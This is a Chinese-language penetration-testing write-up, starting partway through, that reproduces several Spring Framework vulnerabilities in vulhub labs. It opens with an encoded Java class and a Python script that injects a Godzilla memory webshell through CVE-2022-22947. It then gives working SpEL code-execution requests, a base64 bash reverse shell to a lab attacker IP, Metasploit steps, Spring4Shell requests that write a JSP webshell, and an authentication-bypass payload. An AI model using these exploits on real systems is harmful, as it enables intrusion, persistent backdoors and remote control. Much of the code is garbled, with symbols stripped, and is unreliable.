AVMQAVQPBwFVEACpDAFWAVcHAVgMAVkBWgEAJ29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eQcBWwwBXAFdDABpAV4MAV8BHgcBYAwBYQFUDACcAJ0MAIkAigwAYQBiAQAHcGF5bG9hZAcBYgwBYwFUDACBAIIMAWQBZQEACnBhcmFtZXRlcnMBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQwBZgFnDAFoAWkMAWoBPAwAlQCWDAFoAUoMAWsBbAEAEWphdmEvdXRpbC9IYXNoTWFwAQAQM2M2ZTBiOGE5YzE1MjI0YQEAE2phdmF4L2NyeXB0by9DaXBoZXIBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAVwYXRocwEAB0J1aWxkZXIBAAxJbm5lckNsYXNzZXMBAGAoW0xqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8kQnVpbGRlcjsBAElvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbyRCdWlsZGVyAQAFYnVpbGQBAEUoKUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA9wcmludFN0YWNrVHJhY2UBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAKShbTGphdmEvbmV0L1VSTDtMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAtnZXRJbnN0YW5jZQEAKShMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L2NyeXB0by9DaXBoZXI7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBAARpbml0AQAXKElMamF2YS9zZWN1cml0eS9LZXk7KVYBAAdkb0ZpbmFsAQAGKFtCKVtCAQAbamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0AQAxKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEABmxlbmd0aAEAAygpSQEABnVwZGF0ZQEAByhbQklJKVYBAAZkaWdlc3QBAAYoSVtCKVYBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBAAt0b1VwcGVyQ2FzZQEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAC2dldEZvcm1EYXRhAQAfKClMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwoBbQFuAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsKABIBbwEABWFwcGx5AQAtKExtcy9HTWVtU2hlbGw7KUxqYXZhL3V0aWwvZnVuY3Rpb24vRnVuY3Rpb247AQAbcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vAQAHZmxhdE1hcAEAPChMamF2YS91dGlsL2Z1bmN0aW9uL0Z1bmN0aW9uOylMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwEAI29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzAQACT0sBACVMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXM7AQA6KExqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czspVgEACmdldE1lc3NhZ2UBACZvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcAEACGdldEZpcnN0AQANamF2YS91dGlsL01hcAEAA2dldAEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAJc3Vic3RyaW5nAQAWKElJKUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvQnl0ZUFycmF5AQAEanVzdAEAMShMamF2YS9sYW5nL09iamVjdDspTHJlYWN0b3IvY29yZS9wdWJsaXNoZXIvTW9ubzsHAXAMAXEBdAwAqACpAQAiamF2YS9sYW5nL2ludm9rZS9MYW1iZGFNZXRhZmFjdG9yeQEAC21ldGFmYWN0b3J5BwF2AQAGTG9va3VwAQDMKExqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZXMkTG9va3VwO0xqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvaW52b2tlL01ldGhvZFR5cGU7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGU7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTspTGphdmEvbGFuZy9pbnZva2UvQ2FsbFNpdGU7BwF3AQAlamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGVzJExvb2t1cAEAHmphdmEvbGFuZy9pbnZva2UvTWV0aG9kSGFuZGxlcwAhABIADQAAAAQACQBhAGIAAQBjAAAAAgBkAAkAZQBmAAAACQBnAGYAAAAJAGgAZgAAAAoAAQBpAGoAAQBrAAAALwABAAEAAAAFKrcAAbEAAAACAGwAAAAGAAEAAAAWAG0AAAAMAAEAAAAFAG4AbwAAAAkAcABxAAIA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),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(requestMappingHandlerMapping,/gmem)}}}],uri: http://example.com
}
evilUrlactuator/gateway/routes/hacktest
def creatRouter(url):trueUrlurlevilUrlheaders{Content-Type: application/json}response requests.post(trueUrl,datapayload,headersheaders,allow_redirectsFalse)return response.status_code
def reloadRouter(url):trueUrlurlactuator/gateway/refreshresponse requests.post(trueUrl,allow_redirectsFalse)return response.status_code
def callRouter(url):trueUrlurlevilUrlresponse requests.get(trueUrl,allow_redirectsFalse)return response.status_code
def hack(url):result creatRouter(url)if result 201:result reloadRouter(url)if result 200:result callRouter(url)urlurlgmemresponse requests.post(url,allow_redirectsFalse)if response.status_code 200:return sucess:urlelse:return nuknow errordef main():print CVE-2022-22947一键注入哥斯拉内存马 By N0phoneExampleexp.py url仅供学习交流使用 合法测试urlsys.argv[1]if url[len(url)-1] ! /:url url /print(hack(url))if __name____main__:main()漏洞验证
利用这个漏洞需要分多步。
发送如下数据包即可添加一个包含恶意SpEL表达式的路由
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329{id: hacktest,filters: [{name: AddResponseHeader,args: {name: Result,value: #{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\id\}).getInputStream()))}}}],uri: http://example.com
}发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0 发送如下数据包即可查看执行结果
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0 最后发送如下数据包清理现场删除所添加的路由
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close 再刷新下路由
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0 CVE-2022-22963Spring Cloud Function远程代码执行漏洞
漏洞介绍 环境准备
**漏洞原理**Spring Cloud Function 提供了一个通用的模型用于在各种平台上部署基于函数的软件包括像 Amazon AWS Lambda 这样的 FaaS函数即服务function as a service平台。 影响范围
Spring Cloud Function 3.1.x3.1.6
Spring Cloud Function 3.2.x3.2.2参考链接https://ti.qianxin.com/vulnerability/detail/238745 漏洞复现参考https://www.freebuf.com/vuls/344989.html 环境搭建
cd vulhub-master/spring/CVE-2022-22963
docker-compose up -d
docker ps
docker-compose down漏洞发现
Nuclei✅
SpringBoot-Scan✅
项目地址https://github.com/AabyssZG/SpringBoot-Scan 执行命令
python ./SpringBoot-Scan.py -v http://192.168.229.140:8080/
-v --vul 对单一URL进行漏洞利用SpringBootExploit❌
项目地址https://github.com/0x727/SpringBootExploit 从releases下载最新版Spring Boot Exploit压缩包配合JNDIExploit使用。⭐推荐 工具使用参见https://www.ddosi.org/springbootexploit/
Spring_All_Reachable✅
项目地址https://github.com/savior-only/Spring_All_Reachable 命令执行受限。
MSF✅
漏洞应该是存在的但是利用失败了
search CVE-2022-22963
use exploit/multi/http/spring_cloud_function_spel_injection
set RHOSTS 192.168.229.140
set LHOST 192.168.229.128
set RPORT 8080
set ForceExploit true
exploit第三方工具1命令执行✅
来源地址https://github.com/charis3306/CVE-2022-22963 Spring-cloud-function-spel.py
# 检查漏洞是否存在
python ./Spring-cloud-function-spel.py --check post --url http://192.168.229.140:8080/# 尝试命令执行
python ./Spring-cloud-function-spel.py --check post --url http://192.168.229.140:8080/ --cmd curl http://192.168.229.128/whoami# 尝试反弹shell
python ./Spring-cloud-function-spel.py --check post --url http://192.168.229.140:8080/ --ip 192.168.229.128 --port 9999第三方工具2反弹shell✅
项目地址https://github.com/mamba-2021/EXP-POC/blob/main/Spring-cloud-function-SpEL-RCE/Spel_RCE_Bash_EXP.py Spel_RCE_Bash_EXP.py
漏洞验证 利用
发送如下数据包spring.cloud.function.routing-expression头中包含的SpEL表达式将会被执行
POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(touch /tmp/success)
Content-Type: text/plain
Content-Length: 4test然后进入容器docker exec -it 8d3b1b7ae9d7 bash看看可见success成功创建。 反弹 shell
bash -i /dev/tcp/192.168.229.128/6666 01bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}CVE-2022-22965Spring4Shell
漏洞介绍 环境准备
漏洞原理 Spring Framework 存在远程代码执行漏洞在 JDK 9 及以上版本环境下远程攻击者可以利用该漏洞写入恶意代码导致远程代码执行漏洞。 更多信息参见 【安全风险通告】Spring Framework远程代码执行漏洞(CVE-2022-22965)安全风险通告第三次更新 时间线 2022年03月29日晚间 Spring Framework远程代码执行漏洞CVE-2022-22965被监测到任何引用 Spring Framework 的衍生产品均受影响。3月29日深夜该漏洞被国内安全研究人员复现确认。漏洞时间线如下
2022 年 03 月 29 日晚Spring Framework 存在远程代码执行漏洞被国内安全研究人员监测到并第一时间分析复现由于漏洞影响范围极大漏洞风险评级为“极危”但此时官方仍尚未正式发布漏洞修复版本。2022 年 03 月 30 日漏洞技术细节及 POC 公开且发现在野利用事件。2022 年 03 月 31 日Spring 官方发布了 Spring Framework 5.3.18 及 Spring Framework 5.2.20.RELEASE 版本且以 CVE-2022-22965 标识该漏洞多家安全厂商陆续发布确认漏洞存在的安全风险通告。2022年04月01日鉴于此漏洞的严重性国外将 Spring Framework 远程代码执行漏洞(CVE- 2022-22965)命名为“Spring4Shell”。
影响范围
Spring Framework 5.3.X 5.3.18
Spring Framework 5.2.X 5.2.20
及其衍生产品
● JDK ≥ 9
● JRE ≥ 9
注其他版本未更新均受影响环境搭建
cd vulhub-master/spring/CVE-2022-22965
docker-compose up -d
docker ps
docker-compose down漏洞发现
SpringBootExploit和Spring_All_Reachable不支持此漏洞。
Nuclei✅ SpringBoot-Scan✅
项目地址https://github.com/AabyssZG/SpringBoot-Scan 执行命令
python ./SpringBoot-Scan.py -v http://192.168.229.140:8080/
-v --vul 对单一URL进行漏洞利用MSF❌
search CVE-2022-22965
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 192.168.229.140
set LHOST 192.168.229.128
set RPORT 8080
set ForceExploit true
exploit第三方工具1检测漏洞✅
来源地址https://github.com/fullhunt/spring4shell-scan
# 扫描单个URL地址
python3 spring4shell-scan.py -u http://192.168.229.140:8080/# 针对目标环境执行WAF绕过
python3 spring4shell-scan.py -u http://192.168.229.140:8080/ --waf-bypass# 扫描URL地址列表
python3 spring4shell-scan.py -l urls.txt# 扫描Spring Cloud远程代码执行漏洞CVE-2022-22963
python3 spring4shell-scan.py -l urls.txt --test-CVE-2022-22963第三方工具2利用漏洞✅
来源https://github.com/crow821/crowsec/tree/master/Spring_RCE_CVE-2022-22965 vulhub_CVE-2022-22965_poc.py
第三方工具3利用漏洞✅
来源https://github.com/zangcc/CVE-2022-22965-rexbb 使用https://blog.csdn.net/weixin_43847838/article/details/128475095
漏洞验证 利用
发送如下数据包即可修改目标的Tomcat日志路径与后缀利用这个方法写入一个JSP文件
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Diclass.module.classLoader.resources.context.parent.pipeline.first.suffix.jspclass.module.classLoader.resources.context.parent.pipeline.first.directorywebapps/ROOTclass.module.classLoader.resources.context.parent.pipeline.first.prefixtomcatwarclass.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat HTTP/1.1
Host: 192.168.229.140:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %//
c1: Runtime
c2: %
DNT: 1 然后访问刚写入的JSP Webshell执行任意命令
http://localhost:8080/tomcatwar.jsp?pwdjcmdid注意你需要在利用完成后将class.module.classLoader.resources.context.parent.pipeline.first.pattern清空否则每次请求都会写入新的恶意代码在JSP Webshell中导致这个文件变得很大。发送如下数据包将其设置为空
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern HTTP/1.1
Host: 192.168.229.140:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close 警告
总体来说这个漏洞的利用方法会修改目标服务器配置导致目标需要重启服务器才能恢复实际测试中需要格外注意。微步在线介绍了无损检测的方法 漏洞公告 | Spring Core 远程代码执行漏洞已出现在野利用
其他
绿盟发布《D-Eyes应急响应工具spring漏洞排查专版》适配于Windows与Linux系统使用相关客户请联系当地服务同事获取。 【漏洞通告】Spring框架远程代码执行漏洞CVE-2022-22965处置手册
盛邦安全关于这个漏洞做了进一步分析并发布一个自研的漏洞自检工具https://github.com/webraybtl/springcore_detect 关于Spring framework rceCVE-2022-22965的一些问题思考
奇安信发布Spring Framework 远程代码执行漏洞纯离线检测工具“天蚕3.0-Spring漏洞离线专查版”需要登录天问平台才可以获取工具 【天问】新增Spring Framework 远程代码执行漏洞纯离线一键排查解决方案 | 星图实验室
墨菲安全开源工具可应急排查 Spring 新版本修复远程命令执行漏洞(CVE-2022-22965)墨菲安全开源工具可应急排查
CVE-2022-22978VMware Spring Security 身份认证绕过漏洞
漏洞介绍 环境准备
**漏洞原理**由于RegexRequestMatcher过滤不严导致攻击者可利用该漏洞在未授权的情况下构造恶意数据绕过身份认证最终造成配置的权限验证失效。 影响范围
Spring Security 5.5.x 5.5.7
Spring Security 5.6.x 5.6.4
Spring Security 其他低版本同样受影响参考链接https://ti.qianxin.com/vulnerability/detail/246090 漏洞复现参考https://blog.csdn.net/zwy15288408160/article/details/131850711 环境搭建
cd vulhub-master/spring/CVE-2022-22978
docker-compose up -d
docker ps
docker-compose down漏洞发现
专用扫描工具无一发现涉及到的工具在下文会有介绍
Nuclei✅
开发检测脚本由于只检测了响应码因此会存在误报
id: CVE-2022-22978info:name: VMware Spring Security authentication bypass vulnerabilityauthor: lainseverity: highdescription: VMware Spring Security authentication bypass vulnerabilityreference:- https://www.cnblogs.com/surgenry/articles/17303152.htmltags: Springhttp:- method: GETpath:- {{RootURL}}/admin/index%0amatchers-condition: andmatchers:- type: statusstatus:- 200 第三方工具1检测漏洞✅
来源地址https://blog.csdn.net/zwy15288408160/article/details/131850711 工具访问/admin/%0a%0d如果响应码是200即认为存在漏洞有可能误报
漏洞验证 利用
直接访问显示拒绝 使用提示的payload进行登录/admin/index%0a
参考
从0认识识别掌握spring全漏洞(1.8w字超详细看完拿捏spring)文末带工具 渗透测试之地基服务篇服务攻防之框架Spring上 - FreeBuf网络安全行业门户 渗透测试之地基服务篇服务攻防之框架Spring下 - FreeBuf网络安全行业门户
